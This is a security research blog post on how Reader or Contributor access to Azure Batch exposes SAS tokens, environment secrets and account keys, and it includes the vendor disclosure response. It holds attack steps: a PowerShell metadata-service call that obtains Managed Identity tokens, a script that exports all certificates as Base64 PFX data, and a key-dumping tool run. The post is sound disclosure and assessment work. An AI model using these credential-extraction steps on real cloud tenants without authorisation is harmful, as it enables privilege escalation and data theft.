Extracting Sensitive Information from the Azure Batch Service

We’ve recently seen increased adoption of the Azure Batch service in customer subscriptions. In response, we took some time to dive into each component of the Batch service to identify potential areas for misconfiguration and sensitive data exposure. That research surfaced a few key areas to review in the Azure Batch service, which we will cover in this blog.

TL;DR

- Azure Batch allows for scalable compute job execution
  - Think large data sets and High Performance Computing (HPC) applications
- Attackers with Reader access to Batch can:
  - Read sensitive data from job outputs
  - Gain access to SAS tokens for Storage Account files attached to the jobs
- Attackers with Contributor access can:
  - Run jobs on the batch pool nodes
  - Generate Managed Identity tokens
  - Gather Batch Access Keys for job execution persistence

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets.

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background – Pools

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here:

- User-Assigned Managed Identity
  - Can be shared across the pool to allow workers to act as a specific Managed Identity
- Mount configuration
  - Using a Storage Account Key or SAS token, you can add data storage mounts to the pool
- Application packages
  - These are applications/executables that you can make available to the pool
- Certificates
  - This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials



The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.





The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.

While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We reported this to MSRC as an information disclosure issue (see the disclosure timeline below), but it is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL can read all of the files in the Storage Account Container. The default lifetime for these tokens is 7 days, so the exposure window is somewhat limited, but we have seen tokens configured with longer expiration times.
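When triaging a SAS URL pulled from a pool configuration, it helps to confirm its scope and remaining lifetime before using it. The following is a minimal Python sketch, not part of MicroBurst, that reads the standard SAS query parameters (`sp` for permissions, `se` for expiry, `sr` for resource type). The function names, the storage account, and the container in the example URL are hypothetical.

```python
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qs

# Single-letter flags used in the SAS "sp" (signed permissions) parameter.
PERMISSION_NAMES = {
    "r": "read", "l": "list", "w": "write",
    "d": "delete", "a": "add", "c": "create",
}


def parse_sas_expiry(raw):
    """Parse the SAS "se" value (ISO 8601, UTC) into an aware datetime."""
    expiry = datetime.fromisoformat(raw.replace("Z", "+00:00"))
    if expiry.tzinfo is None:  # date-only values carry no offset
        expiry = expiry.replace(tzinfo=timezone.utc)
    return expiry


def describe_sas_url(sas_url, now=None):
    """Summarize the scope and lifetime of a Storage Account SAS URL."""
    now = now or datetime.now(timezone.utc)
    parts = urlsplit(sas_url)
    query = parse_qs(parts.query)
    permissions = query.get("sp", [""])[0]
    expiry_raw = query.get("se", [""])[0]
    expiry = parse_sas_expiry(expiry_raw) if expiry_raw else None
    return {
        "host": parts.netloc,
        "path": parts.path,
        "resource_type": query.get("sr", [""])[0],  # "c" = container, "b" = blob
        # Unknown flags are passed through as the raw letter.
        "permissions": [PERMISSION_NAMES.get(flag, flag) for flag in permissions],
        "expires": expiry,
        "expired": expiry is not None and expiry <= now,
    }


# Hypothetical URL shaped like the container SAS URLs described above.
example_url = (
    "https://examplestorage.blob.core.windows.net/batchfiles"
    "?sv=2021-08-06&se=2023-06-15T12%3A00%3A00Z&sr=c&sp=rl&sig=REDACTED"
)
print(describe_sas_url(example_url))
```

A token that reports `read` and `list` on resource type `c` matches the container-wide exposure described above.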



The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environment variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck finding sensitive information in these variables.
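To speed up review of a long list of environment settings, a simple name-and-value heuristic can surface likely secrets first. The sketch below is illustrative only: it assumes the settings have been exported as a list of `name`/`value` objects (the shape used by the Batch REST API), and the pattern list and function name are our own, not an exhaustive rule set.

```python
import re

# Name fragments that often indicate a secret. This is a heuristic and
# will produce both false positives and false negatives.
SENSITIVE_NAME = re.compile(
    r"(pass(word|wd)?|secret|token|key|conn(ection)?_?str|sas|credential)",
    re.IGNORECASE,
)

# Value fragments typical of SAS URLs and storage connection strings.
SENSITIVE_VALUE_MARKERS = ("sig=", "AccountKey=")


def flag_sensitive_settings(environment_settings):
    """Return the settings whose name or value looks like it holds a secret."""
    flagged = []
    for setting in environment_settings:
        name = setting.get("name", "")
        value = setting.get("value") or ""
        if SENSITIVE_NAME.search(name) or any(
            marker in value for marker in SENSITIVE_VALUE_MARKERS
        ):
            flagged.append(setting)
    return flagged


# Hypothetical settings for illustration.
settings = [
    {"name": "DB_PASSWORD", "value": "hunter2"},
    {"name": "LOG_LEVEL", "value": "info"},
    {"name": "STORAGE", "value": "AccountName=example;AccountKey=REDACTED"},
]
for hit in flag_sensitive_settings(settings):
    print(hit["name"])
```

Anything flagged still needs a manual look, and unflagged settings are worth skimming as well.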

Service Background – Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.).

Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities.

If there’s a User Assigned Managed Identity that you’d like to generate tokens for, and it isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult: when we started investigating the service, we had to request a pool quota increase just to start using it.



To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.

In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

    (Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing).Content

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository – https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:

- Azure Privilege Escalation Using Managed Identities – NetSPI
- Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps – NetSPI
- Managed Identity Attack Paths, Part 1: Automation Accounts – Andy Robbins, SpecterOps



Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.



Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.

If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

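    # Password used to protect the exported PFX files
    $mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText

    # Export each certificate in the store, print it as Base64, then delete the temporary PFX
    Get-ChildItem -Path cert:\CurrentUser\My\ | ForEach-Object {
        try {
            Export-PfxCertificate -Cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
            [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))
            Remove-Item (-join($PWD,'\',$_.PSChildName,'.pfx'))
        }
        # Export errors are silently ignored so the loop continues with the next certificate
        catch {}
    }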

Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

    $b64 = "MII…[Your Base64 Certificate Data]"
    [IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses “TotallyNotaHardcodedPassword...” as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

- Pools Data
  - Environment Variables
  - Start Task Commands
  - Available Storage Container URLs
- Jobs Data
  - Environment Variables
  - Tasks (Job Preparation, Job Manager, and Job Release)
  - Jobs Sub-Tasks
  - Available Storage Container URLs
- With Contributor Level Access
  - Primary and Secondary Keys for Triggering Jobs
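To illustrate the "Available Storage Container URLs" items above, here is a small Python sketch that walks a pool or job definition and yields every resource file URL along with where it was found. It is not how Get-AzBatchAccountData is implemented. It assumes the definition is available as JSON using Batch REST API field names (`storageContainerUrl`, `httpUrl`, `startTask`, `resourceFiles`), and the sample pool is fabricated.

```python
# Keys that hold resource file URLs (assumed from the Batch REST API schema).
URL_KEYS = {"storageContainerUrl", "httpUrl"}


def find_resource_urls(node, path=""):
    """Yield (json_path, url) pairs for every resource file URL under node."""
    if isinstance(node, dict):
        for key, value in node.items():
            child_path = f"{path}.{key}" if path else key
            if key in URL_KEYS and isinstance(value, str):
                yield child_path, value
            else:
                # Recurse so nested tasks (start, preparation, release) are covered.
                yield from find_resource_urls(value, child_path)
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from find_resource_urls(item, f"{path}[{index}]")


# Fabricated pool definition for illustration.
pool = {
    "id": "pool1",
    "startTask": {
        "commandLine": "cmd /c echo hello",
        "resourceFiles": [
            {
                "storageContainerUrl": (
                    "https://examplestorage.blob.core.windows.net/batchfiles"
                    "?sp=rl&sig=REDACTED"
                )
            }
        ],
    },
}
for location, url in find_resource_urls(pool):
    print(location, url)
```

Because the walk is recursive, the same function works on job definitions, where the URLs sit under the job preparation, job manager, and job release tasks.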

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:

Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

    PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose
    VERBOSE: Logged In as kfosaaen@example.com
    VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
    VERBOSE: 1 Batch Account(s) Enumerated
    VERBOSE: Attempting to dump data from the testspi account
    VERBOSE: Attempting to dump keys
    VERBOSE: 1 Pool(s) Enumerated
    VERBOSE: Attempting to dump pool data
    VERBOSE: 13 Job(s) Enumerated
    VERBOSE: Attempting to dump job data
    VERBOSE: Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be ‘by design’. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.
